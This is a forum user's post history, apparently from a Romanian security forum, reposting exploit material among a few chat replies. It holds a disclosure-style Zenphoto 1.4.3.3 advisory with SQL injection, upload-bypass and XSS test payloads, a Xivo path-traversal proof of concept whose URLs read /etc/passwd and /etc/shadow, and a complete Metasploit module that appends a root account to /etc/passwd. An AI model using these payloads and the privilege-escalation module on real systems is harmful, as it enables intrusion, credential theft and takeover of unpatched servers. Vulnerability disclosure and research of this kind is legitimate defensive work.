The_Arhitect
-
Posts
425 -
Joined
-
Last visited
-
Days Won
2
Posts posted by The_Arhitect
-
-
Ardel domne , Pe ei, pe ei! Pe mama lor!
-
Kent doar atat.
-
-
-
Zenphoto 1.4.3.3 Multiple Vulnerabilities
[waraxe-2012-SA#096] - Multiple Vulnerabilities in Zenphoto 1.4.3.3
===============================================================================
Author: Janek Vind "waraxe"
Date: 03. November 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-96.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Zenphoto is a standalone CMS for multimedia focused websites. Our focus lies on
being easy to use and having all the features there when you need them (but out
of the way if you do not.)
Zenphoto features support for images, video and audio formats, and the Zenpage
CMS plugin provides a fully integrated news section (blog) and custom pages to
run entire websites.
http://www.zenphoto.org/
https://code.google.com/p/zenphoto/
Affected versions: Zenphoto 1.4.3.3 and older
Patched version: Zenphoto 1.4.3.4
###############################################################################
1. SQL Injection in "zp-core/zp-extensions/failed_access_blocker.php"
###############################################################################
Reason: insufficient sanitization of user-supplied data
Attack vector: user-supplied HTTP header "X_FORWARDED_FOR"
Preconditions:
1. plugin "failed_access_blocker" activated (disabled by default)
"failed_access_blocker" plugin will log every failed authentication attempt:
Php script "zp-core/zp-extensions/failed_access_blocker.php" line 75:
------------------------[ source code start ]----------------------------------
function failed_access_blocker_adminGate($allow, $page) {
...
// add this attempt
$sql = 'INSERT INTO '.prefix('plugin_storage').' (`type`, `aux`,`data`) VALUES
("failed_access", "'.time().'","'.getUserIP().'")';
query($sql);
// check how many times this has happened recently
count = db_count('plugin_storage','WHERE `type`="failed_access" AND
`data`="'.getUserIP().'"');
------------------------[ source code end ]------------------------------------
IP address of the user comes from function "getUserIP()" and is used in SQL
query. Let's look at the function "getUserIP()".
Php script "zp-core/functions.php" line 1979:
------------------------[ source code start ]----------------------------------
function getUserIP() {
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
return sanitize($_SERVER['HTTP_X_FORWARDED_FOR'], 0);
} else {
return sanitize($_SERVER['REMOTE_ADDR'], 0);
------------------------[ source code end ]------------------------------------
Function "sanitize()" does following things to the input data:
1. strips slashes if magic_quotes_gpc=on
2. strips null bytes
3. strips html tags
So we can see, that function "sanitize()" will prevent null byte tricks and
most of the XSS exploits, but it does not escape or delete single and double
quotes, therefore SQL Injection may still be possible. Actually this function
makes SQL Injection more likely to occur because it reverts effects of the
"magic_quotes_gpc". As result of such insuffient input data sanitization,
attacker can use HTTP header "X_FORWARDED_FOR" for SQL Injection.
Test:
Let's use Firefox browser with Tamper Data Add-on.
1. Open admin page:
http://localhost/zenphoto1433/zp-core/admin.php
2. Activate Tamper data (Start Tamper)
3. Try to log in with bogus credentials, Tamper Data triggers
4. "Tamper with request?" -> "Tamper"
5. "Add element" -> X_FORWARDED_FOR=war"axe
6. Click "OK" and tampered request will go to the server
As result we will see blank page (OK 200 response code, content length 0).
But let's look at "debug.log" in "zp-data":
Backtrace: USER ERROR: MySql Error: ( <em>INSERT INTO `[prefix]plugin_storage`
(`type`, `aux`,`data`) VALUES ("failed_access", "1349792737","war"axe")</em> )
failed. MySql returned the error <em>You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right
syntax to use near 'axe")'
###############################################################################
2. SQL Injection in "zp-core/zp-extensions/search_statistics.php"
###############################################################################
Reason: insufficient sanitization of user-supplied data
Attack vector: user-supplied HTTP header "X_FORWARDED_FOR"
Preconditions:
1. plugin "search_statistics" activated (disabled by default)
Php script "zp-core/zp-extensions/search_statistics.php" line 101:
------------------------[ source code start ]----------------------------------
static function handler($search_statistics, $type, $success, $dynamic,
$iteration) {
...
$sql = 'INSERT INTO '.prefix('plugin_storage').' (`type`, `aux`,`data`) VALUES
("search_statistics", "'.getUserIP().'",'.db_quote(serialize($store)).')';
query($sql);
------------------------[ source code end ]------------------------------------
User's IP address comes from function "getUserIP()" and is used in SQL query.
As shown in previous case, it is possible to use HTTP header "X_FORWARDED_FOR"
for SQL Injection, because "getUserIP()" does not sufficiently sanitize
user-supplied input data.
###############################################################################
3. IP address spoofing vulnerability via HTTP header "X_FORWARDED_FOR"
###############################################################################
Reason: trusting spoofable input data
Attack vector: user-supplied HTTP header "X_FORWARDED_FOR"
Preconditions: none
We saw in two previous cases, that function "getUserIP()" can't be trusted,
because attacker can easily spoof his/her IP addresss by using HTTP header
"X_FORWARDED_FOR". Vulnerable function "getUserIP()" is heavily used in logging
functionality.
Example code lines from "zp-core/zp-extensions/security-logger.php":
security_logger::Logger($success, $user, $name, getUserIP(), 'Back-end',
$auth, $pass);
security_logger::Logger($success, $user, $name, getUserIP(), 'Front-end',
$athority, $pass);
security_logger::Logger(false, $user, $name, getUserIP(), 'Blocked access',
'', $page);
security_logger::Logger(false, $user, $name, getUserIP(), 'Blocked album',
'', $page);
security_logger::Logger(true, $user, $name, getUserIP(), 'user_'.$class,
'zp_admin_auth', $userobj->getUser());
security_logger::Logger(false, $user, $name, getUserIP(), 'XSRF access blocked',
'', $token);
security_logger::Logger($allow, $user, $name, getUserIP(), $action,
'zp_admin_auth', basename($log));
security_logger::Logger($success, $user, $name, getUserIP(), 'setup_'.$action,
'zp_admin_auth', $txt);
So we can conclude, that it is possible for attacker to spoof IP address in
Zenphoto security logs. By injecting newlines ("\n") and tabs ("\t") it's even
possible to add arbitrary fake entries to the security logs.
###############################################################################
4. File Type Restriction Bypass Vulnerability in
"zp-core/zp-extensions/uploader_jQuery/uploader.php"
###############################################################################
Preconditions:
1. Logged in as admin with image upload privileges
2. "uploader_jQuery" plugin activated (active by default)
Php script "zp-core/zp-extensions/uploader_jQuery/uploader.php" line 227:
------------------------[ source code start ]----------------------------------
private function handle_file_upload($uploaded_file, $name, $size, $type,
$error) {
...
$error = $this->has_error($uploaded_file, $file, $error);
if (!$error && $file->name) {
...
move_uploaded_file($uploaded_file, $file_path);
if (is_valid_image($name) || is_valid_other_type($name)) {
...
} else {
$error = UPLOAD_ERR_EXTENSION; // invalid file uploaded
break;
------------------------[ source code end ]------------------------------------
As seen above, uploaded file is first validated by function "has_error":
Php script "zp-core/zp-extensions/uploader_jQuery/uploader.php" line 26:
------------------------[ source code start ]----------------------------------
$types = array_keys($_zp_extra_filetypes);
$types = array_merge($_zp_supported_images, $types);
$types = zp_apply_filter('upload_filetypes',$types);
...
$options = array(
...
'accept_file_types' => '/('.implode('|',$types).')$/i'
...
private function has_error($uploaded_file, $file, $error) {
...
if (!preg_match($this->options['accept_file_types'], $file->name)) {
return 'acceptFileTypes';
------------------------[ source code end ]------------------------------------
We can see, that "preg_match()" regex validation is used for file extension
sanitization. Example validation regex from default installation:
"/(gif|jpg|jpeg|png|bmp|flv|fla|3gp|mov|mp3|mp4|m4v|m4a)$/i"
At first look it seems to be secure - only picture and video files are allowed
to be uploaded. But if we analyze this regex little bit more, then we can spot
one fatal flaw - it does not check for dot character before file extension.
As result, it is possible to upload file named like "info.php.123png" and it
will pass through first validation, done by "has_error()". We can see, that
after "has_error()" uploaded file is moved from temporal location to the target
album directory by "move_uploaded_file()" function. After that second
validation by function "is_valid_image()" follows:
Php script "zp-core/functions-basic.php" line 1173:
------------------------[ source code start ]----------------------------------
function is_valid_image($filename) {
global $_zp_supported_images;
$ext = strtolower(substr(strrchr($filename, "."), 1));
return in_array($ext, $_zp_supported_images);
}
------------------------[ source code end ]------------------------------------
We can see, that file extension is checked again and this time it is secure
validation and can't be fooled. This situation usually means, that exploitation
is not possible, but not this time. Uploaded file is already moved to the target
folder, directly accessible over HTTP and there is missing important piece of
php code, which should delete such files. What code does after failed
"is_valid_image()", is setting up error flag "UPLOAD_ERR_EXTENSION" followed by
"break". This seems to be as syntax error from programmer and will lead to php
fatal error: "Cannot break/continue 1 level". In my local testserver this means
error 500 response from webserver, but still, file is uploaded to the target
directory already and stays there, so exploitation is possible.
Test:
1. Log in as admin with image upload privileges and navigate to upload page:
http://localhost/zenphoto1433/zp-core/admin-upload.php?page=upload&tab=albums
Make sure, that "Upload handler" is "jQuery". In this test target album is
"testalbum".
2. Try to upload php file containing "<?php phpinfo()?>" and named as
"info.php.123png"
As result we can see error message:
"info.php.123png 0.02 KB Error: Internal Server Error"
Still, despite of the error message, upload succeeded. Uploaded file can
be accessed directly, resulting in php code execution:
http://localhost/zenphoto1433/albums/testalbum/info.php.123png
###############################################################################
5. File Type Restriction Bypass Vulnerability in
"zp-core/admin-functions.php"
###############################################################################
Preconditions:
1. Logged in as admin with image upload privileges
2. "zip_open()" function not available
Php script "zp-core/admin-functions.php" line 2565:
------------------------[ source code start ]----------------------------------
/**
* Unzips an image archive
*
* @param file $file the archive
* @param string $dir where the images go
*/
function unzip($file, $dir) { //check if zziplib is installed
if(function_exists('zip_open')) {
$zip = zip_open($file);
if ($zip) {
while ($zip_entry = zip_read($zip)) { // Skip non-images in the zip file.
$fname = zip_entry_name($zip_entry);
$seoname = internalToFilesystem(seoFriendly($fname));
if (is_valid_image($seoname) || is_valid_other_type($seoname)) {
if (zip_entry_open($zip, $zip_entry, "r")) {
$buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
...
} else {
require_once(dirname(__FILE__).'/lib-pclzip.php');
$zip = new PclZip($file);
if ($zip->extract(PCLZIP_OPT_PATH, $dir, PCLZIP_OPT_REMOVE_ALL_PATH) == 0) {
------------------------[ source code end ]------------------------------------
We can see that when "zip_open()" function is available, then Zenphoto will read
zip entries from archieve one by one and there is as checking for file type.
Only files with whitelisted extensions are extracted to the target folder.
But in case of missing function "zip_open()" (specific lib not installed)
custom third-party library "PclZip" will be used, this time without any checks
for file extensions. So it is possible to upload zip archive with php files
inside and they will be extracted to the target album, allowing attacker to
gain php level access.
###############################################################################
6. File Existence Disclosure in
"zp-core/zp-extensions/uploader_flash/check.php"
###############################################################################
Preconditions: none
Php script "zp-core/zp-extensions/uploader_flash/check.php" line 26:
------------------------[ source code start ]----------------------------------
$fileArray = array();
foreach ($_POST as $key => $value) {
if ($key != 'folder') {
if (file_exists($_SERVER['DOCUMENT_ROOT'] . $_POST['folder'] . '/' . $value)) {
$fileArray[$key] = $value;
}
}
}
echo json_encode($fileArray);
------------------------[ source code end ]------------------------------------
Test:
-------------------------[ test code start ]-----------------------------------
<html><body><center>
<form action="http://localhost/zenphoto1433/zp-core/zp-extensions/uploader_flash/check.php" method="post">
<input type="hidden" name="folder" value="">
<input type="hidden" name="test" value="../../../../../../../../etc/passwd">
<input type="submit" value="Test">
</form>
</center></body></html>
--------------------------[ test code end ]------------------------------------
Result:
{"test":"..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd"}
Attacker is able to detect file presence on remote server, because server
response is different in case of existing and non-existent files.
###############################################################################
7. Database Backup Files Unauthorized Access Vulnerability
###############################################################################
Zenphoto offers database backup functionality in admin interface:
Php script "zp-core/utilities/backup_restore.php" line 140:
------------------------[ source code start ]----------------------------------
if (isset($_REQUEST['backup']) && db_connect()) {
...
$folder = SERVERPATH . "/" . BACKUPFOLDER;
$filename = $folder . '/backup-' . date('Y_m_d-H_i_s').'.zdb';
if (!is_dir($folder)) {
mkdir ($folder, FOLDER_MOD);
}
@chmod($folder, FOLDER_MOD);
$handle = fopen($filename, 'w');
------------------------[ source code end ]------------------------------------
We can see that database backup files are named using simple naming scheme.
Created backup files are directly accessible without any restrictions:
http://localhost/zenphoto1433/backup/backup-2012_10_07-19_20_15.zdb
As result there may be leakage of sensitive information, like admin's hashed
credentials:
s:4:"user";s:6:"waraxe";s:4:"pass";s:40:"123456789abcdef123456789abc...
There is "IndexIgnore *" directive in ".htaccess" file, so by default
directory browsing is not possible and filename must be guessed somehow,
but still there are vulnerable zenphoto installations on Internet:
Google Dork:
filetype:zdb inurl:backup
Besides, there is about 60 * 60 * 24 * 365 = 31 536 000 possible filenames
per year, so it is possible to use bruteforce method and try to guess backup's
filename.
###############################################################################
8. Reflected XSS in "zp-core/zp-extensions/federated_logon/OpenID_logon.php"
###############################################################################
Reason:
1. uninitialized variables "$msg", "$error", "$success"
2. insufficient sanitization of html output
Attack vector:
1. user-supplied parameters "msg", "error", "success"
2. user-supplied GET parameter "redirect"
Preconditions:
1. register_globals=on (for parameters "msg", "error", "success")
Php script "zp-core/zp-extensions/federated_logon/OpenID_logon.php" line 38:
------------------------[ source code start ]----------------------------------
<?php if (isset($msg)) { print "<div class=\"alert\">$msg</div>"; } ?>
<?php if (isset($error)) { print "<div class=\"error\">$error</div>"; } ?>
<?php if (isset($success)) { print "<div class=\"success\">$success</div>"; } ?>
------------------------[ source code end ]------------------------------------
Tests:
http://localhost/zenphoto1433/zp-core/zp-extensions/federated_logon/OpenID_logon.php?msg=<script>alert(123);</script>
http://localhost/zenphoto1433/zp-core/zp-extensions/federated_logon/OpenID_logon.php?error=<script>alert(123);</script>
http://localhost/zenphoto1433/zp-core/zp-extensions/federated_logon/OpenID_logon.php?success=<script>alert(123);</script>
http://localhost/zenphoto1433/zp-core/zp-extensions/federated_logon/OpenID_logon.php?redirect="+onclick=alert(123)+w="
###############################################################################
9. Reflected XSS in "zp-core/zp-extensions/federated_logon/Verisign_logon.php"
###############################################################################
Reason: insufficient sanitization of html output
Attack vector: user-supplied GET parameter "redirect"
Preconditions: none
Test:
http://localhost/zenphoto1433/zp-core/zp-extensions/federated_logon/Verisign_logon.php?redirect="+onclick=alert(123)+w="
###############################################################################
10. Reflected XSS in "themes/stopdesign/comment_form/comment_form.php"
###############################################################################
Reason:
1. uninitialized variable "$_zp_themeroot"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "_zp_themeroot"
Preconditions: register_globals=on
Php script "themes/stopdesign/comment_form/comment_form.php" line 5:
------------------------[ source code start ]----------------------------------
global $_zp_themeroot;
?>
<p class="mainbutton" id="addcommentbutton"><a href="#addcomment" class="btn">
<img src="<?php echo $_zp_themeroot ?>
------------------------[ source code end ]------------------------------------
Tests:
http://localhost/zenphoto1433/themes/stopdesign/comment_form/comment_form.php?_zp_themeroot="><script>alert(123);</script>
###############################################################################
11. Reflected XSS in "zp-core/zp-extensions/cloneZenphoto/cloneTab.php"
###############################################################################
Reason:
1. uninitialized variable "$msg"
2. insufficient sanitization of html output
Attack vector:
1. user-supplied parameter "msg"
2. user-supplied POST parameter "path"
Preconditions:
1. logged in as admin
2. register_globals=on (for variable "$msg")
First XSS vulnerability is caused by uninitialized variable "$msg":
http://localhost/zenphoto1433/zp-core/zp-extensions/cloneZenphoto/cloneTab.php?success=1&msg[]=<script>alert(123);</script>
Second XSS vulnerability relates to POST parameter "path":
Php script "zp-core/zp-extensions/cloneZenphoto/cloneTab.php" line 62:
------------------------[ source code start ]----------------------------------
if (isset($_POST['path'])) {
$path = sanitize($_POST['path']);
} else {
...
$downtitle = '.../'.basename($path);
...
<script type="text/javascript">
...
function folderChange() {
$('#downbutton').attr('title','<?php echo $downtitle; ?>
------------------------[ source code end ]------------------------------------
Test:
-------------------------[ test code start ]-----------------------------------
<html><body><center>
<form action="http://localhost/zenphoto1433/zp-core/zp-extensions/cloneZenphoto/cloneTab.php" method="post">
<input type="hidden" name="path" value="');};alert(123);function q(){var w=('">
<input type="submit" value="Test">
</form>
</center></body></html>
--------------------------[ test code end ]------------------------------------
###############################################################################
12. Reflected XSS in "zp-core/admin-thumbcrop.php"
###############################################################################
Reason: insufficient sanitization of html output
Attack vector: user-supplied parameters "subpage" and "tagsort"
Preconditions: logged in as admin
Php script "zp-core/admin-thumbcrop.php" line 160:
------------------------[ source code start ]----------------------------------
$subpage = sanitize($_REQUEST['subpage']);
$tagsort = sanitize($_REQUEST['tagsort']);
...
<button type="reset"
...
&subpage=<?php echo $subpage; ?>&tagsort=<?php echo $tagsort; ?>
------------------------[ source code end ]------------------------------------
Tests (parameters "a" and "i" must be valid):
http://localhost/zenphoto1433/zp-core/admin-thumbcrop.php?a=testalbum&i=waraxe.jpg&subpage='"+autofocus+onFocus="alert(123);//
http://localhost/zenphoto1433/zp-core/admin-thumbcrop.php?a=testalbum&i=waraxe.jpg&tagsort='"+autofocus+onFocus="alert(123);//
###############################################################################
13. Reflected XSS in "zp-core/admin-upload.php"
###############################################################################
Reason: insufficient sanitization of html output
Attack vector: user-supplied GET parameters "folderdisplay" and "albumtitle"
Preconditions: logged in as admin
Php script "zp-core/admin-upload.php" line 306:
------------------------[ source code start ]----------------------------------
if (isset($_GET['folderdisplay'])) {
?>
$('#folderdisplay').val('<?php echo sanitize($_GET['folderdisplay']); ?>');
...
if (isset($_GET['albumtitle'])) {
?>
$('#albumtitle').val('<?php echo sanitize($_GET['albumtitle']); ?>');
------------------------[ source code end ]------------------------------------
Tests:
http://localhost/zenphoto1433/zp-core/admin-upload.php?folderdisplay=');alert('xss
http://localhost/zenphoto1433/zp-core/admin-upload.php?albumtitle=');alert('xss
###############################################################################
14. Reflected XSS in "zp-core/admin-tags.php"
###############################################################################
Reason: insufficient sanitization of html output
Attack vector: user-supplied parameter "tagsort"
Preconditions: logged in as admin
Php script "zp-core/admin-tags.php" line 14:
------------------------[ source code start ]----------------------------------
if (isset($_REQUEST['tagsort'])) {
$tagsort = sanitize($_REQUEST['tagsort'], 0);
...
<form name="tag_delete" action="?delete=true&tagsort=<?php echo $tagsort;
...
<form name="tag_rename" action="?rename=true&tagsort=<?php echo $tagsort;
...
<form name="new_tags" action="?newtags=true&tagsort=<?php echo $tagsort;
------------------------[ source code end ]------------------------------------
Test:
http://localhost/zenphoto1433/zp-core/admin-tags.php?tagsort="><script>alert(123);</script>
###############################################################################
15. Reflected XSS in "zp-core/admin-users.php"
###############################################################################
Reason: insufficient sanitization of html output
Attack vector: user-supplied GET parameter "error"
Preconditions: logged in as admin
Php script "zp-core/admin-users.php" line 406:
------------------------[ source code start ]----------------------------------
case 'format':
echo '<h2>'.urldecode(sanitize($_GET['error'],2)).'</h2>';
------------------------[ source code end ]------------------------------------
Test:
http://localhost/zenphoto1433/zp-core/admin-users.php?page=users&mismatch=format&error=%253cscript%253ealert(123);%253c/script%253e
###############################################################################
16. Reflected XSS in
"zp-core/zp-extensions/tiny_mce/plugins/tinyzenpage/js/dialog.php"
###############################################################################
Reason: insufficient sanitization of html output
Attack vector: user-supplied GET parameter "album"
Preconditions: logged in as admin
Php script "zp-core/zp-extensions/tiny_mce/plugins/tinyzenpage/js/dialog.php"
line 50:
------------------------[ source code start ]----------------------------------
var albumname = '<?php if(isset($_GET["album"]))
{ echo sanitize($_GET["album"]); } else { $_GET["album"] = ""; } ?>';
------------------------[ source code end ]------------------------------------
Test:
http://localhost/zenphoto1433/zp-core/zp-extensions/tiny_mce/plugins/tinyzenpage/tinyzenpage.php?album=';}};alert(123);var+kala={zzz+:+function(ed){var+qwe='
###############################################################################
17. Reflected XSS in
"zp-core/zp-extensions/tiny_mce/config/zenpage-default-full.js.php"
###############################################################################
Reason:
1. uninitialized variable "locale"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "locale"
Preconditions: register_globals=on
Php script "zp-core/zp-extensions/tiny_mce/config/zenpage-default-full.js.php"
line 14:
------------------------[ source code start ]----------------------------------
<script type="text/javascript">
...
language: "<?php echo $locale; ?>",
------------------------[ source code end ]------------------------------------
Test:
http://localhost/zenphoto1433/zp-core/zp-extensions/tiny_mce/config/zenpage-default-full.js.php?locale=</script><script>alert(123);</script>
###############################################################################
18. Reflected XSS in "zp-core/admin-comments.php"
###############################################################################
Reason: insufficient sanitization of html output
Attack vector: user-supplied GET parameter "ndeleted"
Preconditions: logged in as admin
Php script "zp-core/admin-comments.php" line 279:
------------------------[ source code start ]----------------------------------
if ((isset($_GET['ndeleted']) && $_GET['ndeleted'] > 0) ||
isset($_GET['sedit'])) {
?>
<div class="messagebox fade-message">
<?php
if (isset($_GET['ndeleted'])) {
?>
<h2><?php echo $_GET['ndeleted']; ?>
------------------------[ source code end ]------------------------------------
Tests:
http://localhost/zenphoto1433/zp-core/admin-comments.php?sedit=1&ndeleted=<script>alert(123);</script>
http://localhost/zenphoto1433/zp-core/admin-comments.php?ndeleted=1<script>alert(123);</script>
###############################################################################
19. Reflected XSS in "zp-core/zp-extensions/GoogleMap/m.php"
###############################################################################
Reason: insufficient sanitization of html output
Attack vector: user-supplied GET parameter "data"
Preconditions: none
Remarks: bypasses IE, Chrome and Safari anti-XSS features
Php script "zp-core/zp-extensions/GoogleMap/m.php" line 57:
------------------------[ source code start ]----------------------------------
$mapdata = base64_decode(str_replace(' ', '+', sanitize($_GET['data'])));
if ($mapdata) {
if (function_exists('bzcompress')) {
$mapdata = bzdecompress($mapdata);
} else {
$mapdata = gzuncompress($mapdata);
}
$mapdata = unserialize($mapdata);
}
...
if (is_array($mapdata)) {
$MAP_OBJECT = new GoogleMapAPI(sanitize($_GET['type']));
...
foreach ($mapdata as $key=>$datum) {
$MAP_OBJECT->$key = $datum;
}
...
echo $MAP_OBJECT->printMap();
------------------------[ source code end ]------------------------------------
We can see, that user-supplied GET parameter "data" will be base64-decoded and
then decompressed and unserialized to the array "mapdata". This is followed by
creation of "GoogleMapAPI" object and after that array "mapdata" is used for
populating "GoogleMapAPI"-s members. It means, that attacer is able to manipulate
with arbitrary members of the "GoogleMapAPI" object.
Php script "zp-core/zp-extensions/GoogleMap/GoogleMap.php" line 304:
------------------------[ source code start ]----------------------------------
class GoogleMapAPI {
...
var $js_alert = '<b>Javascript must be enabled in order to use Google Maps.</b>';
...
function printMap() {
echo $this->getMap();
...
function getMap() {
...
if(!empty($this->js_alert)) {
$_output .= '<noscript>' . $this->js_alert . '</noscript>' . "\n";
------------------------[ source code end ]------------------------------------
We can see that "GoogleMapAPI" member "js_alert" is used in method "printMap()".
Therefore attacker can overwrite "js_alert" with XSS payload.
First we need for testing serialized, compressed and base64_encoded data. This
can be obtained using php script below:
-------------------------[ test code start ]-----------------------------------
<?php
error_reporting(E_ALL);
$arr = array();
$arr['js_alert']='</noscript><script>alert(123);</script>';
$bz = base64_encode(bzcompress(serialize($arr)));
$gz = base64_encode(gzcompress(serialize($arr)));
echo "bz: $bz\n";
echo "gz: $gz\n";
?>
--------------------------[ test code end ]------------------------------------
Tests:
In case of bz compression:
http://localhost/zenphoto1433/zp-core/zp-extensions/GoogleMap/m.php?data=QlpoNDFBWSZTWcu%2fgEMAAA%2bbgBBguH0AAKo13AogAFRQAAADIGVNNNGmZIMBGEgGPQOa%2flg2jGWBuiGSqXfdt1NRk8QHt7GpsF8DBGJPFBvxdyRThQkMu%2fgEMA
In case of gz compression:
http://localhost/zenphoto1433/zp-core/zp-extensions/GoogleMap/m.php?data=eJxLtDK0qi62srBSyiqOT8xJLSpRsi62Mra0UrLRz8svTi7KLCixs4HSYHkNQyNjTWsbfaiYknUtAP1BFmU
###############################################################################
20. Full Path Disclosure in multiple scripts
###############################################################################
http://localhost/zenphoto1433/themes/default/theme_description.php
Fatal error: Call to undefined function gettext() in
C:\apache_www\zenphoto1433\themes\default\theme_description.php on line 4
More affected scripts:
themes/effervescence_plus/colorbox/functions.php
themes/effervescence_plus/simpleviewer/functions.php
themes/effervescence_plus/functions.php
themes/effervescence_plus/index.php
themes/effervescence_plus/sidebar.php
themes/effervescence_plus/theme_description.php
themes/garland/colorbox/functions.php
themes/garland/contact_form/form.php
themes/garland/functions.php
themes/garland/index.php
themes/garland/sidebar.php
themes/garland/theme_description.php
themes/garland/themeoptions.php
themes/stopdesign/comment_form/comment_form.php
themes/stopdesign/contact_form/form.php
themes/stopdesign/comment.php
themes/stopdesign/functions.php
themes/stopdesign/normalizer.ph
themes/stopdesign/theme_description.php
themes/zenpage/footer.php
themes/zenpage/functions.php
themes/zenpage/sidebar.php
themes/zenpage/theme_description.php
themes/zpmobile/comment_form/comment_form.php
themes/zpmobile/functions.php
themes/zpmobile/theme_description.php
zp-core/utilities/refresh_database.php
zp-core/utilities/refresh_metadata.php
zp-core/404.php
zp-core/auth_zp.php
zp-core/class-album.php
zp-core/class-comment.php
zp-core/class-gallery.php
zp-core/class-image.php
zp-core/class-load.php
zp-core/class-search.php
zp-core/class-transientimage.php
zp-core/controller.php
zp-core/functions-controller.php
zp-core/functions-i18n.php
zp-core/lib-GD.php
zp-core/lib-Imagick.php
zp-core/lib-utf8.php
zp-core/zp-extensions/admin-approval.php
many more scripts in "/zp-core/zp-extensions/" directory
Disclosure timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
15.10.2012 -> Contacted developers
15.10.2012 -> Developers asked for details
15.10.2012 -> Sent details to developers
02.11.2012 -> Patched version 1.4.3.4 released
03.11.2012 -> Advisory released
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------ -
Xivo 1.2 Arbitrary File Download
Xivo 1.2 Arbitrary File Download under root privileges
===============================================================
Date: 6/11/2012
Exploit Author: Mr.Un1k0d3r
Vendor Homepage: https://wiki.xivo.fr
Software Link: https://wiki.xivo.fr/index.php/XiVO_1.1-Gallifrey/Install_XiVO_With_CD
Version: 1.2 (last patched version)
Tested on: Linux xivo 2.6.32-5-486
Exploit:
Using the web interface you can download any file from the system. The web application is running under root privileges.
You can download clear text password, /etc/passwd, /etc/shadow and many more...
POC:
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/passwd
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/shadow
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/asterisk/manager.conf
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/asterisk/cel_pgsql.conf
This vulnerability was discover by Mr.Un1k0d3r From RingZer0 Team.
Exploit-DB Note:
This appears to have been fixed
https://projects.xivo.fr/issues/3912
http://git.xivo.fr/?p=official/xivo-skaro.git;a=commit;h=127ab43e6d8e8ed94f16ff388fb62fd611a40e19 -
-
-
-
Metasploit < v4.4 pcap_log Plugin Privilege Escalation Exploit
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
require 'msf/core/exploit/local/linux_kernel'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/local/unix'
load 'lib/msf/core/post/common.rb'
load 'lib/msf/core/post/file.rb'
load 'lib/msf/core/exploit/local/unix.rb'
load 'lib/msf/core/exploit/local/linux.rb'
class Metasploit3 < Msf::Post
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Common
include Msf::Exploit::Local::Linux
include Msf::Exploit::Local::Unix
def initialize(info={})
super( update_info( info, {
'Name' => 'Metasploit pcap_log Local Privilege Escalation',
'Description' => %q{
Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these
filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within.
This, and all the other packets, are appended to /etc/passwd.
Successful exploitation results in the creation of a new superuser account.
This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd.
},
'License' => MSF_LICENSE,
'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'],
'Platform' => [ 'linux','unix','bsd' ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'References' =>
[
[ 'BID', '54472' ],
[ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
[ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
],
'DisclosureDate' => "Jul 16 2012",
'Targets' =>
[
[ 'Linux/Unix Universal', {} ],
],
'DefaultTarget' => 0,
}
))
register_options(
[
Opt::RPORT(2940),
OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]),
OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ])
], self)
end
def run
print_status "Waiting for victim"
initial_size = cmd_exec("cat /etc/passwd | wc -l")
i = 60
while(true) do
if (i == 60)
# 0a2940: cmd_exec is slow, so send 1 command to do all the links
cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
i = 0
end
i = i+1
if (cmd_exec("cat /etc/passwd | wc -l") != initial_size)
# PCAP is flowing
pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
print_status("Sending file contents payload to #{session.session_host}")
udpsock = Rex::Socket::Udp.create(
{
'Context' => {'Msf' => framework, 'MsfExploit'=>self}
})
udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
break
end
sleep(1)
end
if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
print_good("Success. You should now be able to login or su to the 'metasploit' user with password 'metasploit'.")
else
print_error("Failed. You should manually verify the 'metasploit' user has not been added")
end
# 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload
# However beceause the session is not a terminal, su will not always allow this.
end
endSursa: Metasploit < v4.4 pcap_log Plugin Privilege Escalation Exploit
-
-
-
-
sunt inca activ
-
This is a call tracer application which traces the person name via his phone number
Name of application : TrueCaller
For Blackberry users : Just goto app world and search Truecaller and voila
